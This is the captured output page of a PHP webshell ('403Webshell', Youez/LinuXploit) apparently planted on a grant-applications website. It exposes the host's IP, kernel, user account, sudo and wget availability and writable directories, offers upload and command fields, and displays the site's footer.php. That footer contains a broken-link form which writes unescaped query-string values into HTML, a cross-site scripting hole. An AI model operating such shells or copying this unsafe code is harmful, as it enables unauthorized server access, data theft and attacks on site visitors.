403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/usa_sites/usagrantapplications.org/membersonly/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/usa_sites/usagrantapplications.org/membersonly/footer.php
		</td>
	</tr>
</table>
    <div class="base">
    <div class="base_">
        <a href="/v4/">Home</a> | <a href="terms.php">Terms</a> | <a href="glossary.php">Glossary</a> | <a href="contact.php">Contact</a> | <a href="/v2/login.php?logout=1">Logout</a> <div class="copy">&copy; USA Grant Applications Copyright <?php echo date('Y');?></div>
    </div>
    </div>
	
<!-- BEGIN Report Broken Link Stuff -->
<style type="text/css">
	#report_broken_link p, #report_broken_link li, #report_broken_link ol { font-size:11px; margin:3px 0px; }
	#report_broken_link input[type=submit] { background:#193387; }
</style>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
<script type="text/javascript">
	var broken_link = false;
	function toggle_report_broken_link_form() {
		if(broken_link) {
			$('#report_broken_link').stop().animate({bottom:'-290px'},500,function() {broken_link = !broken_link;});
		} else {
			$('#report_broken_link').stop().animate({bottom:'0px'},500,function() {broken_link = !broken_link;});
		}
	}
	function close_report_broken_link_form() {
		$('#report_broken_link').stop().animate({bottom:'-290px'},500,function() {broken_link = false;});
	}
	function submit_report_broken_link_form() {
		if($('#report_broken_link').find('input:text,textarea').val().length==0) {
			alert('Please copy and paste the text of the broken link.');
			return false;
		}
		var str = "";
		$('#report_broken_link').find('input,textarea').each(function() {
			str += (str=="") ? this.name+"="+escape($(this).val()) : "&"+this.name+"="+escape($(this).val());
		});
		var img = new Image();
		img.src = "https://surfcrm.com/lc/admin/add_broken_link.php?"+str;
		alert('Thank you for submitting this link as broken. We will get it fixed as soon as possible.');
		close_report_broken_link_form();
		return false;
	}
</script>
<div id="report_broken_link" style="position:fixed;bottom: -290px;right:0px;">
	<div style="border-top-left-radius:10px; border-top-right-radius:10px;width: 176px;height: 32px;border: 3px solid black;border-bottom: none;background: #193387;cursor:pointer; float:right;" onclick="toggle_report_broken_link_form();">
		<!-- <img src="/images/attention.png" style="float:left;margin: 4px 2px 0px 2px;" />--><p style="font-weight:normal;font-size:10px;margin: 9px;text-align: center;color: white;">Find a Broken Link? Click Here.</p>
	</div>
	<div style="width: 502px;height: 264px;border: 3px solid black;color: black;background: white;text-align: left;padding: 10px; clear:both;">
		<form onsubmit="return submit_report_broken_link_form();">
			<?php
				function build_recursive_querystring($arr, $querystring = '', $parent_key = '') {
					if(!empty($arr)) {
						foreach($arr as $k=>$v) {
							$key = ($parent_key) ? $parent_key.'[\''.$k.'\']' : $parent_key.$k;
							if(is_array($v)) {
								$querystring = build_recursive_querystring($v, $querystring, $key, $depth+1);
							} else {
								$key = str_replace("\'",'',$key);
								$querystring .= ($querystring=='') ? "?{$key}={$v}" : "&{$key}={$v}";
							}
						}
						return $querystring;
					} else {
						return $querystring;
					}
				}
				$querystring = build_recursive_querystring($_GET);
			?>
			<input type="hidden" name="bad_url_location" value="http://<?= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"].$querystring; ?>" />
			<input type="hidden" name="site" value="<?= $_SERVER['SERVER_NAME']; ?>" />
			<input type="hidden" name="ts" value="<?= time(); ?>" />
			<p>Find a broken link? We want to know about it.</p>
			<p>Please provide us with the following information so we can fix it.</p>
			<ol>
				<li>
					<strong>Paragraph Text the Broken Link was found in.</strong> Copy and paste the paragraph here.<br />
					<textarea name="bad_text" style="width:456px;height:78px"></textarea>
				</li>
				<li>
					<strong>Broken URL Link.</strong> Copy and paste the actual website URL that is broken here. (http://broken_link_website.com)<br />
					<input type="text" name="bad_url" style="width:456px;" />
				</li>
			</ol>
			<input type="submit" name="submit" value="Submit" class="submit" />
		</form>
	</div>
</div>
<!-- END Report Broken Link Crap -->
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit